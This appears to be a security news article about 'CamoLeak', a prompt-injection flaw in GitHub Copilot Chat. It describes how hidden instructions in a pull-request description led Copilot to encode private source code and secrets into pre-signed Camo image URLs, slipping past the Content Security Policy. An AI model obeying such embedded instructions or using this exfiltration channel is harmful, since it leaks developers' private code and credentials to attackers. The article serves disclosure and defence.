Hackers could secretly steal sensitive data from private repositories because of a serious flaw in GitHub Copilot Chat This article explores exploit called camoleak. . The flaw made it possible to steal source code, API keys, and cloud secrets without having to run any malicious code.

This exploit, called "CamoLeak," shows how AI-assisted development is becoming more dangerous. According to a BlackFog report, security providers stress the need for evolving defenses and stopping attacks at the endpoint to break the kill chain because traditional monitoring can't find data exfiltration through trusted channels. In October 2025, the flaw was made public. This happened shortly after GitHub fixed the problem by turning off image rendering in Cop Pilot Chat in August 2025.

The attack happened in four steps: The attacker sent a pull request (PR) with hidden instructions for prompt injection in the description. A developer with access to a private repository asked Copilot to look over the PR, not knowing that this would give the AI the bad instructions. Copilot then put the encoded data into pre-signed image URLs and sent requests to the attacker's server while the victim's browser was displaying the responses.

The CamoLeak software did a great job of getting around GitHub's Content Security Policy (CSP) by making a list of valid, signed addresses for its Camo image proxy ahead of time. On the attacker's server, each address was shown as a clear 1×1 pixel, which stood for one encoded character.